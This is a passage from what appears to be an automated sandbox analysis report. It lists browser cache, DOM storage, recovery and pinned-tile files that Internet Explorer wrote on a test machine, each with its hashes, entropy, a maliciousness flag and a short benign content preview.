                                                                                                                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\6CRF1DVL\www.youtube[1].xml
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):13412
                                                                                                                                                                    Entropy (8bit):5.140209567632931
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:WxnbnbnbnhJcExgIXYW/elRTL47hFJ5oeN2SFO7FzVnhvVnh+c:WxnbnbnbnhJcExgIXYW/elRTL47hFJ5A
                                                                                                                                                                    MD5:F721C37A844FDFA2157028DCE7D3B436
                                                                                                                                                                    SHA1:A7F878D74A67545A1E5BA52A63A85039A2F159DA
                                                                                                                                                                    SHA-256:6C24D9BAC32523E07425ECFB6549F746CBC4001A3208E0C873406820749D6185
                                                                                                                                                                    SHA-512:4218D9956153C6B3CCC0DCDF91CD5E4F051E7DCB9B18C4193086A1A8649F13BB2DBF930A8A5271F0B4C9C3BBF36C3EA03E0D0F3E74B87329E768BBFA28FF6EE1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <root></root><root><item name="__sak" value="1" ltime="1511629392" htime="30877448" /></root><root></root><root></root><root></root><root><item name="__sak" value="1" ltime="1668229392" htime="30877448" /></root><root></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot;expiration&quot;:1648825501277,&quot;creation&quot;:1617289501307}" ltime="1669949392" htime="30877448" /></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot;expiration&quot;:1648825501277,&quot;creation&quot;:1617289501307}" ltime="1669949392" htime="30877448" /><item name="yt-remote-connected-devices" value="{&quot;data&quot;:&quot;[]&quot;,&quot;expiration&quot;:1617375901593,&quot;creation&quot;:1617289501593}" ltime="1671989392" htime="30877448" /></root><root><item name="yt-remote-device-id" value="{&quot;data&quot;:&quot;16309e03-4768-44fc-a8f1-f9e6ce5f22ed&quot;,&quot
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\8LV1ZCXG\www.who[1].xml
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):143829
                                                                                                                                                                    Entropy (8bit):4.515525048995759
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:FXhPDSk6x1EeN5m7fGa6VAbACvHCwYHangdebubzLhPDSk6x1EeN5m7fGa6VAbAb:vNP
                                                                                                                                                                    MD5:5FA3BFE78401BAC8CAB1BDEB72B8A292
                                                                                                                                                                    SHA1:BC1D5D984ADDF10604F2229273E9D3F53BA2CC16
                                                                                                                                                                    SHA-256:4A8655BFB05EF37FDA7FF734816304C0EDD1B6813824AD66E2DF6884C5CCFBF9
                                                                                                                                                                    SHA-512:85796B49C7BAD2BEDB8D1F855AF21F3A55820B5C16752802EFA16E9B7A4ADD83EF8D0FD559AA9D6FAD1C64B133F416A579ED04700F9F49EED2C73017A6904209
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <root></root><root></root><root><item name="at-rand" value="0.6325622714627502" ltime="1454229392" htime="30877448" /></root><root><item name="at-rand" value="0.6325622714627502" ltime="1454229392" htime="30877448" /><item name="at-lojson-cache-ra-5803f964fe6c9599" value="{&quot;pc&quot;:&quot;flwi,shin&quot;,&quot;customMessageTemplates&quot;:[],&quot;subscription&quot;:{&quot;active&quot;:true,&quot;edition&quot;:&quot;BASIC&quot;,&quot;tier&quot;:&quot;basic&quot;,&quot;reducedBranding&quot;:true,&quot;insightsEnabled&quot;:false},&quot;customMessageMetadata&quot;:{&quot;oauthEmailProviders&quot;:[&quot;mailchimp&quot;]},&quot;config&quot;:{&quot;_default&quot;:{&quot;widgets&quot;:{&quot;flwi&quot;:{&quot;thankyou&quot;:false,&quot;orientation&quot;:&quot;horizontal&quot;,&quot;shape&quot;:&quot;square&quot;,&quot;widgetId&quot;:&quot;970d&quot;,&quot;services&quot;:[{&quot;service&quot;:&quot;rss&quot;,&quot;usertype&quot;:&quot;user&quot;,&quot;id&quot;:&quot;http://www.who.int/a
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{918CB189-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32856
                                                                                                                                                                    Entropy (8bit):1.8519324045420333
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:IwmGcprDGwpLdG/ap8cGIpcM3iGvnZpvM39GvHZp9M34GoyqpvM36Go4HpcM1S9T:r6ZdZZ2sWGt/frtWHWGSjG6GhtGOy3
                                                                                                                                                                    MD5:B8E4499C7E10D5A10F0E49E30CD60070
                                                                                                                                                                    SHA1:B9F63CCA91373D2A991F353B5EA936D091028C84
                                                                                                                                                                    SHA-256:0571623CA16B21752D14F93C6638B716DAFDE8795BA6D9D0A1AAA452D1E6354F
                                                                                                                                                                    SHA-512:C07B51294ECDA1805991071C66B925226A3DB263C3B708C550A1203E078F58C8FF3391342959DA9A306545474E825F19EB0849A624DE0B00E3DB863EE660D081
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{918CB18B-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48412
                                                                                                                                                                    Entropy (8bit):2.700508333218304
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:rDztPoPOV61eQ7f2PzE7Xu+h5u+hjQaf2Pzv7Xu+h5u+hjv:4f4o7XPnPVQaf4r7XPnPVv
                                                                                                                                                                    MD5:E869C615262E121505784CD6AF929D4B
                                                                                                                                                                    SHA1:15624E9B139F95B34C7057ED29CFF6C44343F3C6
                                                                                                                                                                    SHA-256:9CC98F77594952ABBB06975FD3FCF3EB3EF25F1A8E611D833480503A0892AEC9
                                                                                                                                                                    SHA-512:ADE4FF4545734114FEEE41A5FCF134B50F4E3463B54F388622E79AB6C1117E93A18CEA5D9E21386CC91D06E5B7DC49EDADDE06E2F78BAB81CEF8362DCE9B87FC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AB82FDC0-92FB-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16984
                                                                                                                                                                    Entropy (8bit):1.5670653260950873
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:IwAGcprZGwpauG4pQOGrapbS8GQpKnG7HpRcTGIpG:rkZTQO6ABSUAGTIA
                                                                                                                                                                    MD5:13DB5EE275598324200B8C9F757385A1
                                                                                                                                                                    SHA1:8546D972C6E6D69CE93BDB374031FB9CB873C204
                                                                                                                                                                    SHA-256:D446F2F6D59DB0190CE89AE3EA5F7DA7299FC84FC963C3E77C2E1F35CFA05B45
                                                                                                                                                                    SHA-512:D18BCB8D94A08011B66317704913FC6BEC786C7373AE12CD9BFEAED2459E6903CD1CEE4FB1A18F8829DCFC420DB4A46A47FA06ED55EEB66B798045B710EB8AF4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.125840918900346
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxOE8Ek6E+nWimI002EtM3MHdNMNxOE8Ek6E+nWimI00ObVbkEtMb:2d6NxOASZHKd6NxOASZ76b
                                                                                                                                                                    MD5:5817DFC0D38DE76BA0DE394C00872D03
                                                                                                                                                                    SHA1:5431811D04C527FC71FC18585C30B0D46635A555
                                                                                                                                                                    SHA-256:F65CC55D836F1E36B2C392C3DD9DE2FB5FE14AFFE2A02745B92BBFEA83434C0B
                                                                                                                                                                    SHA-512:09B9B342C1684F0B377CEDFF051919560B425451D4BC341FF11F97030DB704FF60C9E6DC36CBA45C58244B1308ACA7DCD65939662EAD39B0084647546B150697
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.096817193273539
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxe2k4aSknWimI002EtM3MHdNMNxe2k4aSknWimI00Obkak6EtMb:2d6NxrWSZHKd6NxrWSZ7Aa7b
                                                                                                                                                                    MD5:C7A5C1239C4AAD74B5B3C49F72F477BA
                                                                                                                                                                    SHA1:7429E3568F99CE6D9B08FE93F0FD1DC138651A67
                                                                                                                                                                    SHA-256:BCF9E5C06B4FADFEF297F3F838A65B5492170035C6B0402DAA3224D37259AE7B
                                                                                                                                                                    SHA-512:A3AAB631A85F26ACA59A806EF1ECCCE106293D2AC135D7DE28B855DB5A3614DA2F1F4B037459310679140EE3C955440B33160A4F0F47C933D2F68291FC7DB21F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x75db1ee8,0x01d72708</date><accdate>0x75db1ee8,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x75db1ee8,0x01d72708</date><accdate>0x75db1ee8,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):662
                                                                                                                                                                    Entropy (8bit):5.145560032890936
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxvL8Ek6E+nWimI002EtM3MHdNMNxvL8Ek6E+nWimI00ObmZEtMb:2d6Nxv1SZHKd6Nxv1SZ7mb
                                                                                                                                                                    MD5:025A39C872F6E21737AACE2D9E492F52
                                                                                                                                                                    SHA1:8A3A086045A0D9A9EAC123CB98B175C1C138B2DB
                                                                                                                                                                    SHA-256:2440BB9B0A2D2396EA8AF2D9079505711856BA486C30B2B93FF0BE042F37C6C2
                                                                                                                                                                    SHA-512:EFED77A5AB1CC18894B89E073D4D26F3E49B4A18965E5D8E23DA442C060F5C8DE8F2A8FC13FB6EB3F8EA9F66DDF71216EE49326E4358B387A049FBA162C41A9F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):647
                                                                                                                                                                    Entropy (8bit):5.081825816431691
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxiOK4UnWimI002EtM3MHdNMNxiOK4UnWimI00Obd5EtMb:2d6NxRhUSZHKd6NxRhUSZ7Jjb
                                                                                                                                                                    MD5:B7A724BE550EA060FEE819E49385E03F
                                                                                                                                                                    SHA1:E577EE012A14B5F4A4DA4E3951A52843F9A499E6
                                                                                                                                                                    SHA-256:4A7F8266BC564B0018B92DFD80FF4924A93FD11D23A23B9042C16F646AAA7E80
                                                                                                                                                                    SHA-512:CF69E4AAB7A6BFE8EF303E4F745D94F679711CF087E3B421F09BFBEC65A14DF43850792D52578A07EE5461C5DF7277210B1A05DF13A26E022D16D0FC504CAAE0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.160603405264169
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxhGw8Ek6E+nWimI002EtM3MHdNMNxhGw8Ek6E+nWimI00Ob8K075EtMb:2d6NxQ0SZHKd6NxQ0SZ7YKajb
                                                                                                                                                                    MD5:C311F8A3088FD9396CBD1F72713A4143
                                                                                                                                                                    SHA1:9F4D25B1AA2FEC969FAD0815F991D6FF3D6EA301
                                                                                                                                                                    SHA-256:EC50C527747792DEBF632ABCCBC759EF4740915E7315177EB18C4BF471BF182F
                                                                                                                                                                    SHA-512:392ED4E9B34A3E8896B8F7858CD7089ED82684922FBAB4E84E06DFDF08F6D8C50CA3AED2A7DBA1D7D012B18BB24459EEB6D19AF54BEEDFD28C37123B939DBC67
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.129156444145903
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNx0n8Ek6E+nWimI002EtM3MHdNMNx0n8Ek6E+nWimI00ObxEtMb:2d6Nx0pSZHKd6Nx0pSZ7nb
                                                                                                                                                                    MD5:D21E1537C45262FE762DCDBBEE81D3B1
                                                                                                                                                                    SHA1:1315902A2F8009FC675B4B354C791DF7502D0D32
                                                                                                                                                                    SHA-256:F783FA6CA869E1609C7A1999BD3120A3D59EC7A3EBF7D4EE41B32F30CC196694
                                                                                                                                                                    SHA-512:F7193DDE93B2145C577D4774B31A384F9BD58C98D8EA90755382EF257A9E382902C24865D23456B63BD5501BCC1AC778DA207F31C60ECA2E697C07A5FEE97655
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x75e245f6,0x01d72708</date><accdate>0x75e245f6,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):656
                                                                                                                                                                    Entropy (8bit):5.106878372901071
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxxOK4UnWimI002EtM3MHdNMNxxOK4UnWimI00Ob6Kq5EtMb:2d6NxkhUSZHKd6NxkhUSZ7ob
                                                                                                                                                                    MD5:DF883FC66467547F947AE513EB6E5353
                                                                                                                                                                    SHA1:97C65F02348ECFBE5C5DD61171FA2D403900B46F
                                                                                                                                                                    SHA-256:955E2F5764F89C0FFB1E747F90FA50B55CD127C158331C21AE43ADC93A76D289
                                                                                                                                                                    SHA-512:9D82E9EA5F08A1F79544D591D0CE90FA2D15D9821E9727284FBBB50866F38FB075418A01E8F80ED794FA0DEACC0FE1E7523D5E400362C4B07BD760CE43EF3BB6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x75dfe370,0x01d72708</date><accdate>0x75dfe370,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):659
                                                                                                                                                                    Entropy (8bit):5.0974856911490765
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxcAdVUaWdVUknWimI002EtM3MHdNMNxcAdVUaWdVUknWimI00ObVEtMb:2d6NxNdVUjdVUkSZHKd6NxNdVUjdVUkA
                                                                                                                                                                    MD5:1A0C73DE38AFB51F10C83B510FE8FC60
                                                                                                                                                                    SHA1:34DB6861EEB25568BB3440BA9871C60434EE2353
                                                                                                                                                                    SHA-256:726CDA3028D0B974A662B8C3BA4874CFB7AAA9CD9D851D2CD6AA02AD183D7D52
                                                                                                                                                                    SHA-512:F0E7E7282DE9314B3BAA73C6F04AA8F469F02F09101DA3E012564915A9642902EF741B6FDA08C2B66D0E2619BDB27DEBA995F548140A8B20F5C8A495E0AD1572
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):653
                                                                                                                                                                    Entropy (8bit):5.0771196171500526
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdNMNxfnAdVUaWdVUknWimI002EtM3MHdNMNxfnAdVUaWdVUknWimI00Obe5Es:2d6NxodVUjdVUkSZHKd6NxodVUjdVUkh
                                                                                                                                                                    MD5:AF354A3F28422D41042A1438FC72A8B2
                                                                                                                                                                    SHA1:7840273D7A61648E4B04415D04F3CA354865177D
                                                                                                                                                                    SHA-256:255FCE752439FF2021DC10394116F614EFF8D921945A6EB3E41A3C10C41C0101
                                                                                                                                                                    SHA-512:F98B0EA3944BC7FB838DF1BAB7224A7F9B58C79E5C537AB73C193C2A6049C568E06D889342B9FA8B6177B725A1A386C2BAFC9764BF10FF69C463053C7FF37D13
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x75dd8130,0x01d72708</date><accdate>0x75dd8130,0x01d72708</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1250
                                                                                                                                                                    Entropy (8bit):5.434407934165169
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:k6OGvtoOaPQSV1WvuhHg9XGdqiZNPGFwUmSydj60pF3KVukf/:k6OGFDNuhHgEwRx5yFPpw
                                                                                                                                                                    MD5:007AF6A213563A3A57569B9C249EBA9E
                                                                                                                                                                    SHA1:98C72F0E19283BA539B8EBFCBE6D62F1B562AF6C
                                                                                                                                                                    SHA-256:AE3972A3FDBAE5CD9D79EB53DB8912F366973FCB9A8B31282085257ADB22DAFE
                                                                                                                                                                    SHA-512:0C55AB89D09761C32C20C022E8696AA5DF351F383D293C7CC272437EF777774A9254A0F710D73495E88FEE3B5B7D9C5FC0C1BC94280F66DB6EC48B49B0C2F3A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..h.t.t.p.s.:././.w.w.w...w.h.o...i.n.t./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... ..........................................v..T../........4..y.........................M.........3..1..7........7..2..1.................f....!..q...........d..g...........k.................~.....r.#...+.#4.!2.!'.%...|.....x...........f.....q..E."".!#..9..C..j..0..J..w.....\....."........;..O..s..,..O........u..4..C...........X....._..g........>..q........W. %.%&..d.....L..h.....K..R.....}..O..f........N.&(.$(..O.....[..k.....L.%;.#F..w................)@.$=..R.....^..P.....I.$$.#$..;..............g.&5.#$..O.....C..4.....b.#&. &.%?..7..u........v..f.")..j.....+.....\.....=..9..W.....n..`........O..A.....T.9.. ......a..P. &..%.._........s..C..&..X..Y.......Y.........%.......(...r..q.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\143.3d8bb49f121080f7c65c[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):625
                                                                                                                                                                    Entropy (8bit):4.670963210527082
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:4M9QY/V3IAQLSJw+4rnNe+AsC7hN0iIggkbInFh/El4cLaMN:zK+BVKSetrNzO77041In/El4cLaMN
                                                                                                                                                                    MD5:E60DD66238DEE35752B8B072C7180B0D
                                                                                                                                                                    SHA1:75EE09DC1914B749E778F8D31968FAC048E82B40
                                                                                                                                                                    SHA-256:2DFA62171C6667988D674799A042B576B12881C34464CB9A78FF2138ED3FAA94
                                                                                                                                                                    SHA-512:6A3799D822C16AC980B2EC875C42DC89204C3484AC5E685ECC88626491DBE40F9E91255CE3532D8A4AB31896DD85D4844C131C8CB314786CF6E452F0B69248C8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/143.3d8bb49f121080f7c65c.js
                                                                                                                                                                    Preview: atwpjp([143],{248:function(s,t){s.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M13.73 18.974V12.57l5.945 3.212-5.944 3.192zm12.18-9.778c-.837-.908-1.775-.912-2.205-.965C20.625 8 16.007 8 16.007 8c-.01 0-4.628 0-7.708.23-.43.054-1.368.058-2.205.966-.66.692-.875 2.263-.875 2.263S5 13.303 5 15.15v1.728c0 1.845.22 3.69.22 3.69s.215 1.57.875 2.262c.837.908 1.936.88 2.426.975 1.76.175 7.482.23 7.482.15 0 .08 4.624.072 7.703-.16.43-.052 1.368-.057 2.205-.965.66-.69.875-2.262.875-2.262s.22-1.845.22-3.69v-1.73c0-1.844-.22-3.69-.22-3.69s-.215-1.57-.875-2.262z" fill-rule="evenodd"/></svg>'}});
